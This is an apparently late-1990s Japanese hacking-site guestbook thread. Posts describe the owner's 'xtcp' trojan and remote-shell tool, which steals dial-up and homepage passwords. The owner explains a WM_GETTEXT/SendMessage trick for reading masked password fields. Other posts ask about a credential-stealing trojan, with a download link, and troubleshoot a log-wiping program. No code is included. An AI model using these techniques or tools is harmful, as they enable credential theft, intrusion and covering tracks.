| 【メッセージ】 >個人Server一カ所100MBの空きがあるそうなので >介入予定です。どうですか、いっしょに。 これはありがたい。 ICQで、相談お願いします。 >聴力も音楽関係ずったやってたので殆ど無しです。 私も3才からやってますが、聴力は人並み外れてイイです。 |
| 【名 前】うにゅん 【タイトル】re:(3)質問です.... 11/09 10:56 |
unewn3rd@the-pentagon.com |
| 【メッセージ】 >どうもHost名やPassもろもろを取ってメールで送信 手抜きっぽいヤツなら、私の作ったxtcpに入ってるトロイ と同じ方法じゃないですか? 私のは、例の「接続」ダイアログボックスが出たときに、 ****で隠されてるパスやISPの電話番号、IDを抜いて くるものです。***だろうが何だろうが、WM_GETTEXT をSendMessageで抜けるので、簡単です。 SnadBoyのソースも、そんなので金取るなってね。 |
| 【名 前】時雨 【タイトル】ulwについて 11/09 08:03 |
sigure@iname.com |
| 【メッセージ】 どうも、先日はアドバイスありがとう御座います。 昨日ulwを使ったら、Memory allocation errorってでたんですけど。 どういう意味なのですか。 errorって言うからにはログは消えてないのでしょうか。 |
| 【名 前】Rorrim 【タイトル】スキルアップした〜〜〜い! 11/09 01:30 |
49-hack@ijk.com |
| 【メッセージ】 TEAM89メンバーのSKiLL&TiPSをあげよ〜! ってことで、悪マニュ2を購入!(笑) CDROM入ってましたよ。 2300円は、ちとお高いですが、まあ一応買いました。 しかし「発火ジャパン」「あくまにゅ」「あくまにゅ2」 最近はこの系の本が結構でてますな〜。 |
| 【名 前】AdvanCarmine 【タイトル】Server 11/09 00:26 |
|
| 【メッセージ】 TO Mr.UNYUN 個人Server一カ所100MBの空きがあるそうなので 介入予定です。どうですか、いっしょに。 CGIも使えるそうです。BEAMZさんの提案です。 視力>私はもう弱視に近いです。でも裸眼で生活しています。やばいです。 聴力も音楽関係ずったやってたので殆ど無しです。 |
| 【名 前】HiRoShi 【タイトル】re:(2)質問です.... 11/09 00:12 |
|
| 【メッセージ】 >これ、何のAccountをGetするんですか? バイナリエディタで開いて断片を見て考えたんですが、 どうもHost名やPassもろもろを取ってメールで送信、みたいな感じなんですが(トロイなんだから当たり前か...)どうもよく分かんない...(^^; まだまだ勉強不足みたいです。 視力は0.2と0.1。 中学までは両方2.0あったんだけどなぁ。 |
| 【名 前】reverse 【タイトル】re:(2)始めまして 11/08 23:43 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 > 自分では全然無害なHPだと思ってますが... お。こぶしもボクサーのパンチなら凶器ですからね。 まあ、使い方、でしょうか。 解析好きなので、そういう文書は特に好きです。 今まで、そういう文書ってあまりなかったように思うんで、嬉しい限りです。 バッファオーバーランのやつとか、「使い方」によりますよね。 ぼくは使いこなせませんが。 |
| 【名 前】S 【タイトル】xtcp 11/08 19:40 |
cleangear@mail.goo.ne.jp |
| 【メッセージ】 はじめまして。 xtcpがどんどん凶悪になっていきますね(笑) うれしい限りです。 視力なんですけど、私は0.05と0.02だったりします。 牛乳ビンのふたみたいな眼鏡です。 他人がかけると酔ったりします。 |
| 【名 前】うにゅん 【タイトル】更新 11/08 09:13 |
unewn3rd@the-pentagon.com |
| 【メッセージ】 Winハック用、簡易Shellモドキとしてxtcpをバージョンアップ しました。踏み台、PPP・HP認証のパス抜き、ファイルインスト ール・改変・削除・実行・ダウンロード、システム再起動・停止 などが行えます。 |
| 【名 前】うにゅん 【タイトル】re:(1)Document読破中 11/08 09:05 |
unewn3rd@the-pentagon.com |
| 【メッセージ】 >ここに来る方々の視力って、だいたいどのくらいなんでしょうね。 私は、右0.1、左0.5です。結構いいほうだと思ってます。 >だけど、スタックオーバーフローの辺りは、こんなこともできる >のかと驚く反面、私には難解です。 これを利用したプログラムがrootshellなんかに転がってて よく利用されてますね。 短いプログラムなんですが、ちょっと奥深いですね。 |
| 【名 前】Hariru 【タイトル】Document読破中 11/08 07:35 |
|
| 【メッセージ】 おはようです。Hariruです。 今Documentを読破中ですが、最近視力低下気味でつらい・・・。 そこでふと思ったのですが、 ここに来る方々の視力って、だいたいどのくらいなんでしょうね。 ちなみに私の視力は裸眼で0.1ぐらいです。 Documentの内容は、かなりわかりやすく書いてあるのでとてもありがたいですね。 だけど、スタックオーバーフローの辺りは、こんなこともできるのかと驚く反面、私には難解です。 もっと、勉強せねば! でわ、でわ。 |
| 【名 前】うにゅん 【タイトル】re:(1)始めまして 11/08 06:12 |
unewn3rd@the-pentagon.com |
| 【メッセージ】 >ここまで書いていいもんなのか(笑) >という感想ですね。 自分では全然無害なHPだと思ってますが... |
| 【名 前】うにゅん 【タイトル】re:(1)質問です.... 11/08 06:05 |
unewn3rd@the-pentagon.com |
| 【メッセージ】 >Acountgetterって言うトロイがあるんですが、 >動作原理わかる方いませんか? むっちゃ、exe一本ですね... こりゃ怖い。トロイだけに(笑) これ、何のAccountをGetするんですか? |
| 【名 前】SideWalk 【タイトル】始めまして 11/08 02:34 |
|
| 【メッセージ】 ここまで書いていいもんなのか(笑) という感想ですね。 勉強になりました。ちょくちょく寄らさせて頂きます。 |
| 【名 前】HiRoShi 【タイトル】質問です.... 11/08 00:54 |
|
| 【メッセージ】 今結構撒かれてるツールでAcountgetterって言うトロイがあるんですが、動作原理わかる方いませんか? Disassemblやったりしたんですがどうにも機械語は苦手で(^^; 作者のHP行ってみたら、有料ページだったんで聞けにゃい... これです↓ http://www.aaz.mtci.ne.jp/~nalu001/jpg.zip |
| 【名 前】AdvanCarmine 【タイトル】re:(1)はじめまして。 11/07 20:55 |
http://www.geocities.com/Vienna/Choir/3980/ |
| 【メッセージ】 >StLightさんのところの後継って感じですね。 こっちの方が充実してて期待できますよ、きっと。 なにせ彼は初心者なので。 |
| 【名 前】Raisonne 【タイトル】はじめまして。 11/07 16:32 |
|
| 【メッセージ】 クールなハッキングサイトですね。 ST.Lightさんのところの後継って感じですね。 いろいろ勉強させてもらってます。>うにゅんさん |
| 【名 前】Rorrim 【タイトル】書き込んでみる 11/07 15:30 |
49-hack@ijk.com |
| 【メッセージ】 学園祭中でパソコンが開放されてるんで ちょっと書き込んでみる。 UNIXには、入れないらしい(;;) |
| 【名 前】AdvanCarmine 【タイトル】UNIX_SV prsv1 4.2MP 1.release.1015.18:50 R4000 r4000 11/07 13:40 |
http://www.geocities.com/Vienna/Choir/3980/ |
| 【メッセージ】 初めて出会ったです>UNIX_SV prsv1 4.2MP 1.release.1015.18:50 R4000 r4000 文字化けがひどい。Solaris他ではちゃんと・・・けど。 にしても大手企業はlsするとあたりが凄いですね。 |
| 【名 前】reverse 【タイトル】遊びに来ました 11/02 00:06 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 実践的で大変、たすかってます。 テキストもしっかりしてるし... |
| 【名 前】UNYUN 【タイトル】re:(1)abput ulw.c 11/01 20:23 |
unewn3rd@the-pentagon.comhttp://www.fortunecity.com/skyscraper/byte/551/index.html |
| 【メッセージ】 >Memory allocation error >とでます ログがむちゃくちゃ大きい or メモリが足らないです。 swapを追加すると動くと思いますが... 手抜きで、一度ログをメモリにとり込むので、そのうち 改良版を出すかもしれません。 |
| 【名 前】J0hnz 【タイトル】abput ulw.c 11/01 17:02 |
j0hnz@thor.prohosting.comhttp://j0hnz.hypermart.net/ |
| 【メッセージ】 ulw.c 落とさせてもらいました そこで早速コンパイルしたんですが実行すると Memory allocation error とでます 直訳すると 記憶割り当て考え違い どういうことでしょうか? SunOs5.4です |
| 【名 前】UNYUN 【タイトル】BBS開設しました 11/01 09:11 |
unewn3rd@the-pentagon.comhttp://www.fortunecity.com/skyscraper/byte/551/index.html |
| 【メッセージ】 えーと、BBSを開設しました。 気軽にカキコしてくださいね。 質問君もOKです(答えるかどうか分かりませんが...) |
Homeへ
| アミューザーネット ハイパーボード2.1 |